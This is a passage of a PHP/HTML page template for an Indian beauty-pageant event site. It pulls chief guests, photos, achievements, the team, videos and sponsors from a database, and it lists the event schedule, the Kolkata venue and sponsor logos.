                                            Hina Kauser is the Mrs. Asia Winner 2019 and a Haut Monde Mrs. India Worldwide Finalist 2019. She is active on social media platforms such as Instagram and Facebook, where she proudly identifies with these titles. In addition to her pageant achievements, Hina is also an advocate and a professional actor/model.
                                        </p>
                                        <!-- <p class="text-justify wow fadeInUp" data-wow-duration="500ms" > <i class="fa fa-star pink" aria-hidden="true"></i> Aditi Govitrikar is an Indian actress, physician, and former fashion model.</p>
                            <p class="text-justify wow fadeInUp" data-wow-duration="500ms" > <i class="fa fa-star pink" aria-hidden="true"></i> She is the only Indian woman to win Mrs. World title in 2001</p>
                            <p class="text-justify wow fadeInUp" data-wow-duration="500ms" > <i class="fa fa-star pink" aria-hidden="true"></i> From 1997 until 2004, Govitrikar remains the only Indian supermodel with both a medical doctor and a psychologist qualification.</p> -->

                                        <!--about-info end-->
                                    </div>
                                </div>
                                <!--<div class="col-lg-6 col-md-6 col-sm-12 p-0">-->
                                <!--    <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">-->
                                <!--        <img loading="lazy" src="https://www.tiskapageants.com/assets/images/jury/new/aditi.png" class="img-responsive" alt="Miss India Registration" />-->
                                <!--    </div>-->
                                <!--</div>-->
                            </div>

                            <div class="row text-center mt-5">
                                <!--<div class="col-lg-6 col-md-6 col-sm-12 p-0">-->
                                <!--    <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">-->
                                <!--        <img loading="lazy" src="https://www.tiskapageants.com/assets/images/1 (1).jpeg" class="img-responsive" alt="Miss India Registration" />-->
                                <!--    </div>-->
                                <!--</div>-->

                                <?php
                                include 'db_connect.php';

                                $sql = "SELECT * FROM chief_guests ORDER BY guest_number ASC";
                                $result = $conn->query($sql);

                                if ($result && $result->num_rows > 0) {
                                    while ($row = $result->fetch_assoc()) {
                                        $name = htmlspecialchars($row['name']);
                                        $title = htmlspecialchars($row['title']);
                                        $photo = !empty($row['photo']) ? $row['photo'] : 'assets/images/default.jpg';
                                ?>
                                        <div class="col-lg-3 mb-4">
                                            <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">
                                                <img loading="lazy" src="<?= $photo ?>" class="img-responsive cheif-images" alt="<?= $name ?>" />
                                            </div>
                                            <div class="about-info text-center">
                                                <h2 class="wow fadeInRight mb-2" data-wow-duration="500ms" style="font-size: 22px;">
                                                    <span class="pink"><?= strtoupper($name) ?></span>
                                                </h2>
                                                <p class="mb-2"><?= $title ?></p>
                                            </div>
                                        </div>
                                <?php
                                    }
                                } else {
                                    echo '<div class="col-12"><p class="text-center text-muted">No chief guests found.</p></div>';
                                }

                                $conn->close();
                                ?>

                                <!--Glimpse-sec end-->
                            </div>
            </section>






            <section class="doc-sec sec-padding">
                <div class="container">
                    <div class="sec-title">
                        <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                            <span class="fa-stack">
                                <i class="fa rhex fa-stack-2x"></i>
                                <i class="fa fa-ticket fa-stack-1x"></i>
                            </span>
                        </span>
                        <h3 class="wow fadeInRight" data-wow-duration="500ms">
                            Glimpse of Season <span class="pink">-6</span> <small>2025</small>
                        </h3>
                    </div>

                    <?php
                    include 'db_connect.php';

                    $session = 'session6';
                    $sql = "SELECT * FROM photos WHERE session = ? AND is_featured = 1 ORDER BY id DESC";
                    $stmt = $conn->prepare($sql);
                    $stmt->bind_param("s", $session);
                    $stmt->execute();
                    $result = $stmt->get_result();
                    ?>

                    <div class="doc-sec-details">
                        <div class="abt-imgs">
                            <div class="row">
                                <?php if ($result && $result->num_rows > 0): ?>
                                    <?php while ($row = $result->fetch_assoc()): ?>
                                        <?php
                                        $imgPath = 'uploads/' . htmlspecialchars($row['file_name']);
                                        $altText = "Featured Photo - " . htmlspecialchars(pathinfo($row['file_name'], PATHINFO_FILENAME));
                                        ?>
                                        <div class="col-lg-4 col-md-4 col-sm-6 mb-4">
                                            <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">
                                                <img src="<?= $imgPath ?>" alt="<?= $altText ?>" class="img-responsive" loading="lazy">
                                                <a href="<?= $imgPath ?>" title="View Image" class="html5lightbox">
                                                    <i class="fa fa-search"></i>
                                                </a>
                                            </div>
                                        </div>
                                    <?php endwhile; ?>
                                <?php else: ?>
                                    <div class="col-12">
                                        <p>No <strong>featured photos</strong> found for <?= htmlspecialchars($session) ?>.</p>
                                    </div>
                                <?php endif; ?>
                            </div>
                        </div>
                    </div>

                    <!-- Second Row Images -->

                </div>
        </div>
        </div>

        <!-- Call to Action Button -->
        <div class=" text-center wow fadeInUp" data-wow-duration="300ms">
            <a href="nwGallery.php" title="See More Gallery"
                class="btn-default mt-3"><i class="fa fa-user"></i> See More Gallery</a>
        </div>
        </div>
        </section>

        <section class="doc-sec1 sec-padding">
            <div class="container">
                <div class="Season-2 row" style="margin-bottom: 30px;">
                    <div class="sec-title">
                        <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                            <span class="fa-stack">
                                <i class="fa rhex fa-stack-2x"></i>
                                <i class="fa fa-star fa-stack-1x"></i>
                            </span>
                        </span>
                        <h3 class="wow fadeInRight" data-wow-duration="500ms">Our Achievement</h3>
                    </div>

                    <div class="doc-sec-details">
                        <div class="abt-imgs">
                            <div class="row">
                                <?php
                                include 'db_connect.php';

                                // Fetch the most recent featured achievement
                                $sql = "SELECT * FROM achievements WHERE is_featured = 1 ORDER BY id DESC LIMIT 1";
                                $result = $conn->query($sql);

                                if ($result && $result->num_rows > 0) {
                                    $row = $result->fetch_assoc();

                                    $images = [];

                                    if (!empty($row['photo1'])) $images[] = $row['photo1'];
                                    if (!empty($row['photo2'])) $images[] = $row['photo2'];
                                    if (!empty($row['photo3'])) $images[] = $row['photo3'];

                                    foreach ($images as $index => $img) {
                                        echo '<div class="col-lg-4 col-md-4 col-sm-6">
                <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">
                    <img loading="lazy" src="' . $img . '" class="img-fluid" alt="Achievement ' . ($index + 1) . '" />
                    <a href="' . $img . '" title="View Full Image" class="html5lightbox">
                        <i class="fa fa-search"></i>
                    </a>
                </div>
            </div>';
                                    }
                                } else {
                                    echo '<p>No featured achievements found.</p>';
                                }
                                ?>

                            </div>
                        </div>
                    </div>

                </div>

                <div class=" text-center wow fadeInUp" data-wow-duration="300ms">
                    <a href="achive.php" title="See more achievements" class="btn-default mt-3">
                        <i class="fa fa-user"></i> See More Achievement
                    </a>
                </div>
            </div>
        </section>

        <section class="about-sec sec-padding" id="about" data-scroll-index="1">
            <div class="container">
                <div class="sec-title">
                    <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                        <!-- <span class="fa-stack"><i class="fa rhex fa-stack-2x"></i><i class="fa fa-star fa-stack-1x"></i></span> -->
                    </span>
                    <h3 class="wow fadeInRight" data-wow-duration="500ms">
                        Venue: <span class="pink">ITC Royal Bengal Hotel, Kolkata</span>
                    </h3>
                </div>

                <div class="about-sec-details">
                    <div class="row">
                        <div class="col-lg-6">
                            <div class="abt-imgs">
                                <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">
                                    <img loading="lazy" src="assets/images/hotel/hotel1.jpg" class="img-fluid"
                                        alt="The Leela Ambience Convention Hotel - Front View" />
                                    <a href="assets/images/venue/hotel1.webp" title="View Full Image"
                                        class="html5lightbox">
                                        <i class="fa fa-search"></i>
                                    </a>
                                </div>
                            </div>
                        </div>

                        <div class="col-lg-6">
                            <div class="abt-imgs">
                                <div class="row">
                                    <div class="col-lg-6 col-md-6 col-sm-6">
                                        <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">
                                            <img loading="lazy" src="assets/images/hotel/hotel2.jpg"
                                                class="img-fluid"
                                                alt="The Leela Ambience Convention Hotel - Lobby" />
                                            <a href="assets/images/venue/hotel2.webp" title="View Full Image"
                                                class="html5lightbox">
                                                <i class="fa fa-search"></i>
                                            </a>
                                        </div>
                                    </div>

                                    <div class="col-lg-6 col-md-6 col-sm-6">
                                        <div class="abt-img wow fadeInDown" data-wow-duration="200ms">
                                            <img loading="lazy" src="assets/images/hotel/hotel3.avif"
                                                class="img-fluid"
                                                alt="The Leela Ambience Convention Hotel - Dining Area" />
                                            <a href="assets/images/venue/hotel3.webp" title="View Full Image"
                                                class="html5lightbox">
                                                <i class="fa fa-search"></i>
                                            </a>
                                        </div>
                                    </div>

                                    <div class="col-lg-6 col-md-6 col-sm-6">
                                        <div class="abt-img wow fadeInLeft" data-wow-duration="300ms">
                                            <img loading="lazy" src="assets/images/hotel/hotel4.jpg"
                                                class="img-fluid"
                                                alt="The Leela Ambience Convention Hotel - Room" />
                                            <a href="assets/images/venue/hotel4.webp" title="View Full Image"
                                                class="html5lightbox">
                                                <i class="fa fa-search"></i>
                                            </a>
                                        </div>
                                    </div>

                                    <div class="col-lg-6 col-md-6 col-sm-6">
                                        <div class="abt-img wow fadeInDown" data-wow-duration="400ms">
                                            <img loading="lazy" src="assets/images/hotel/hotel5.jpg"
                                                class="img-fluid"
                                                alt="The Leela Ambience Convention Hotel - Event Space" />
                                            <a href="assets/images/venue/hotel5.webp" title="View Full Image"
                                                class="html5lightbox">
                                                <i class="fa fa-search"></i>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>



        <section class="faqs-sec sec-padding">
            <div class="container">
                <div class="sec-title">
                    <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                        <span class="fa-stack"><i class="fa rhex fa-stack-2x"></i><i
                                class="fa fa-microphone fa-stack-1x"></i></span>
                    </span>
                    <h3 class="wow fadeInRight" data-wow-duration="500ms">Event <small></small></h3>
                </div>
                <!--sec-title end-->

                <div class="faqs-sec-details wow fadeInUp" data-wow-duration="300ms">
                    <div class="row">
                        <div class="col-lg-6">
                            <ul class="nav nav-tabs wow fadeInUp" data-wow-delay=".2s" id="myTab6" role="tablist">
                                <li class="nav-item">
                                    <a class="nav-link active" id="ques-tab1" data-toggle="tab" href="#ques1"
                                        role="tab" aria-controls="ques1" aria-selected="true">Day 1</a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" id="ques-tab2" data-toggle="tab" href="#ques2" role="tab"
                                        aria-controls="ques2" aria-selected="false"> Day 2 </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" id="ques-tab3" data-toggle="tab" href="#ques3" role="tab"
                                        aria-controls="ques3" aria-selected="false"> Day 3 </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" id="ques-tab4" data-toggle="tab" href="#ques4" role="tab"
                                        aria-controls="ques4" aria-selected="false"> Day 4 </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" id="ques-tab5" data-toggle="tab" href="#ques5" role="tab"
                                        aria-controls="ques5" aria-selected="false"> Day 5 </a>
                                </li>
                            </ul>
                        </div>

                        <div class="col-lg-6">
                            <div class="tab-content" id="myTabContent6">
                                <div class="tab-pane fade show active" id="ques1" role="tabpanel"
                                    aria-labelledby="ques-tab1">
                                    <div class="ques-details">
                                        <ul>
                                            <li><i class="fa fa-check-circle-o"></i> - Welcome & introduction
                                                session</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Grooming session</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Orientation & press
                                                conference - dinner</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Ramp walk & body posture
                                                training</li>
                                        </ul>
                                    </div>
                                </div>

                                <div class="tab-pane fade" id="ques2" role="tabpanel" aria-labelledby="ques-tab2">
                                    <div class="ques-details">
                                        <ul>
                                            <li><i class="fa fa-check-circle-o"></i> - Fitness session & Mrs. Fit
                                                contest - breakfast</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Makeover for portfolio shoot
                                            </li>
                                            <li><i class="fa fa-check-circle-o"></i> - Photoshoot - lunch</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Ramp training & choreography
                                                - Dinner</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Talent round</li>
                                        </ul>
                                    </div>
                                </div>

                                <div class="tab-pane fade" id="ques3" role="tabpanel" aria-labelledby="ques-tab3">
                                    <div class="ques-details">
                                        <ul>
                                            <li><i class="fa fa-check-circle-o"></i> - Aerobics - breakfast</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Beauty with brain contest
                                            </li>
                                            <li><i class="fa fa-check-circle-o"></i> - Stage rehearsal and dress
                                                rehearsal - Lunch</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Makeover for finale</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Video Shoots</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Finale -Dinner</li>
                                        </ul>
                                    </div>
                                </div>

                                <div class="tab-pane fade" id="ques4" role="tabpanel" aria-labelledby="ques-tab4">
                                    <div class="ques-details">
                                        <ul>
                                            <li><i class="fa fa-check-circle-o"></i> - Rehearsal</li>
                                            <li><i class="fa fa-check-circle-o"></i> - Grand Finale</li>
                                        </ul>
                                    </div>
                                </div>

                                <div class="tab-pane fade" id="ques5" role="tabpanel" aria-labelledby="ques-tab5">
                                    <div class="ques-details">
                                        <ul>
                                            <li><i class="fa fa-check-circle-o"></i> - Winners Shoot</li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>

        <section class="team-sec sec-padding" id="speakers" data-scroll-index="4">
            <div class="container">
                <div class="sec-title">
                    <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                        <span class="fa-stack"><i class="fa rhex fa-stack-2x"></i><i
                                class="fa fa-ticket fa-stack-1x"></i></span>
                    </span>
                    <h3 class="wow fadeInRight" data-wow-duration="500ms"> Management <span class="pink">Team</span>
                    </h3>
                </div>

                <div class="team-sec-details abt-imgs">


                    <?php
                    include 'db_connect.php';

                    // Fetch all featured profiles (you can limit the number if needed)
                    $sql = "SELECT * FROM team_profiles WHERE is_featured = 1 ORDER BY id DESC LIMIT 4";
                    $result = $conn->query($sql);

                    if ($result && $result->num_rows > 0):
                        while ($row = $result->fetch_assoc()):
                            $img = htmlspecialchars($row['image']);
                            $name = htmlspecialchars($row['name']);
                    ?>
                            <div class="team-detail wow fadeInUp" data-wow-duration="200ms">
                                <div class="cmntr-img">
                                    <div class="hex-inner abt-img">
                                        <img loading="lazy" src="<?= $img ?>" class="img-responsive" alt="<?= $name ?>" />
                                        <a href="<?= $img ?>" title="View Full Image" class="ext-link"><i class="fa fa-link"></i></a>
                                    </div>
                                </div>
                                <div class="team-info">
                                    <h3><?= $name ?></h3>
                                </div>
                            </div>
                    <?php
                        endwhile;
                    else:
                        echo "<p>No featured profiles found.</p>";
                    endif;
                    ?>
                </div>
            </div>
        </section>

        <!-- Event Videos Section -->
        <section class="sec-padding" id="sponsor" data-scroll-index="3">
            <div class="container">
                <div class="sec-title">
                    <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                        <span class="fa-stack">
                            <i class="fa rhex fa-stack-2x"></i>
                            <a href="https://www.youtube.com/channel/UC7zsy9R9Ot3tuuC525r3m1Q" target="_blank"
                                style="background: transparent !important; border: none;">
                                <i class="fa fa-youtube fa-stack-1x"></i>
                            </a>
                        </span>
                    </span>
                    <h3 class="wow fadeInRight" data-wow-duration="500ms">Event's Videos</h3>
                </div>
                <!-- sec-title end -->

                <?php
                include 'db_connect.php'; // Your DB connection
                
                // Fetch only featured videos
                $sql = "SELECT * FROM video_links WHERE is_featured = 1 ORDER BY id DESC limit 3";
                $result = $conn->query($sql);
                ?>
                
                                
                                <div class="partner-sec row">
                    <?php while ($row = $result->fetch_assoc()): ?>
                        <div class="col-md-4 pd-15 mb-4">
                            <video width="100%" height="315" controls preload="none">
                                <source src="<?= htmlspecialchars($row['video_path']) ?>" type="<?= htmlspecialchars($row['video_type']) ?>">
                                Your browser does not support the video tag.
                            </video>
                            
                        </div>
                    <?php endwhile; ?>
                </div>

            </div>
        </section>
        <!-- Event Videos Section End -->

        <!-- Event Sponsors Section -->
        <section class="sec-padding" id="sponsor" data-scroll-index="3">
            <div class="container">
                <div class="sec-title">
                    <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                        <span class="fa-stack">
                            <i class="fa rhex fa-stack-2x"></i>
                            <i class="fa fa-thumbs-up fa-stack-1x"></i>
                        </span>
                    </span>
                    <h3 class="wow fadeInRight" data-wow-duration="500ms">Event Sponsors</h3>
                </div>

                <!-- sec-title end -->

                <?php
                include 'db_connect.php';
                $result = $conn->query("SELECT * FROM sponsor WHERE is_featured = 1 ORDER BY id DESC");
                ?>

                <div class="partner-sec">
                    <ul class="partner-carousel">
                        <?php while ($row = $result->fetch_assoc()): ?>
                            <li>
                                <a href="#" title="Sponsor">
                                    <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                        src="<?= htmlspecialchars($row['file_name']) ?>" alt="Event Sponsor Logo" />
                                </a>
                            </li>
                        <?php endwhile; ?>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/24%20mm.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/Chinook%20herbals.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/DN.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/Glam%20looks.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/Gorgeous%20girl.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/K.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/Nake%20u%20glam.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/SNG.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/She%20wings.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/TNB.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/UK%20international.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/aria%20designer.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/asmita.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/concreate.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/crystal%20design.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/cuffs%20n%20lashes.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/deeva.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/estatus.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/forever%20india.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/hazelglow.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kaamini%20make%20over.jpg"
                                    alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kaamini.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kamakhya%20designer.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kamakhya.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kanti%20swweets.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kingone.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kingshuk.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/kirabhi%20beauty.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/lifestyle.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/london%20bride.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/luxury%20lifestyle.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/marjani.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/modazzy.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/niara.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/ridhi%20sidhi.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/rumua.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/runway%20fashion%20mnagment.jpg"
                                    alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/shona.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/since%201978.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/stroke%20digital.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/style%20beats.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/stylize%20india.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/swiss%20military.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/the%20leela.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/vasal%20fashion.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/vastram.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/vasudha.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/wrickie%20angrsh.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                        <li>
                            <a href="#" title="">
                                <img style="width: 100%;" class="img-responsive sp-logo" loading="lazy"
                                    src="assets/images/sponser/zama%20by%20anjali.jpg" alt="Event Sponsor Logo" />
                            </a>
                        </li>
                    </ul>
                    <!-- partner-carousel end -->
                    <div class="spons-dv text-center">
                        <!-- <a href="#" title="" class="btn-default"><i class="fa fa-thumbs-up"></i> become a sponsor</a> -->
                    </div>
                </div>
            </div>
        </section>
        <!-- Event Sponsors Section End -->

        <!--partner-sec end-->
        </div>
        <!--Sponsors Section-->

        <!--  pop-up registration -->
        <!-- <div class="col-sm-12"> -->

        <!--  <a target="_blank" href="#" class="btn btn-lg btn-primary Registers book-appointment">
                    Connect Now
                </a> -->
        <!--<div class="whats-pops btn-non btn-bd">
                    <a style="margin: 5px" href="tel:+917991489999" class="call">
                        <img src="https://www.tiskapageants.com/assets/call.svg" class="call"   alt="call" style="width: 50px;">

                    </a>
                    <a style="margin: 5px" href="https://wa.me/917991489999" class=" whatsapp">
                        <img src="https://www.tiskapageants.com/assets/whatsapp.png" class="whatsapp"  alt="whatsapp" style="width: 50px;">

                    </a> 
                </div>-->
        <!-- </div> -->
        <div class="sticky mobile-header" style="display:none">
            <div class="row">
                <div class="col-100 p-0 m-0" style="width:100%">
                    <a class=" btn-stic color" width="100%" href="registration.php">Register Now</a>
                </div>
                <!--<div class="col-25 p-0 m-0">-->
                <!--    <a class="btn-stic" width="100%" href="https://wa.me/917991489999">Whatsapp</a>-->
                <!--</div>-->
            </div>
        </div>

        <div class="container">
            <div class="row">

                <div class="modal fade" id="myModal" role="dialog">
                    <div class="modal-dialog">

                        <!-- Modal content-->
                        <div class="modal-content" style="background: #ef6faa;">
                            <div class="modal-header">
                                <button type="button" class="close" data-dismiss="modal">&times;</button>

                            </div>
                            <div class="modal-body">
                                <div class="col-lg-12 col-md-12">
                                    <div class="reg-form row">
                                        <div class="sec-title col-md-12" style="margin:0">
                                            <span class="icon-inner " style="visibility: visible !important;"><span
                                                    class="fa-stack"><i class="fa rhex fa-stack-2x"></i><i
                                                        class="fa fa-ticket fa-stack-1x"></i></span></span>
                                            <h3 class=" pink" style="visibility: visible !important;">Event Registration
                                            </h3>
                                        </div>
                                        <!--sec-title end-->
                                        <div class="col-md-6 col-xs-6 text-center">
                                            <a href="registration.html">
                                                <img src="assets/images/miss.png" alt="tiska"
                                                    class="img-responsive lod-img" />
                                            </a>
                                        </div>
                                        <div class="col-md-6 col-xs-6 text-center">
                                            <a href="mrs-registration.html">
                                                <img src="assets/images/mrs.png" alt="tiska"
                                                    class="img-responsive lod-img" />
                                            </a>
                                        </div>
                                        <!--<div class="col-md-4 col-xs-4 text-center">-->
                                        <!--    <a href="https://www.tiskapageants.com/mr-registration">-->
                                        <!--        <img src="assets/images/mr.png" alt="tiska" class="img-responsive lod-img" />-->
                                        <!--    </a>-->
                                        <!--</div>-->
                                    </div>
                                    <!--reg-form end-->

                                </div>

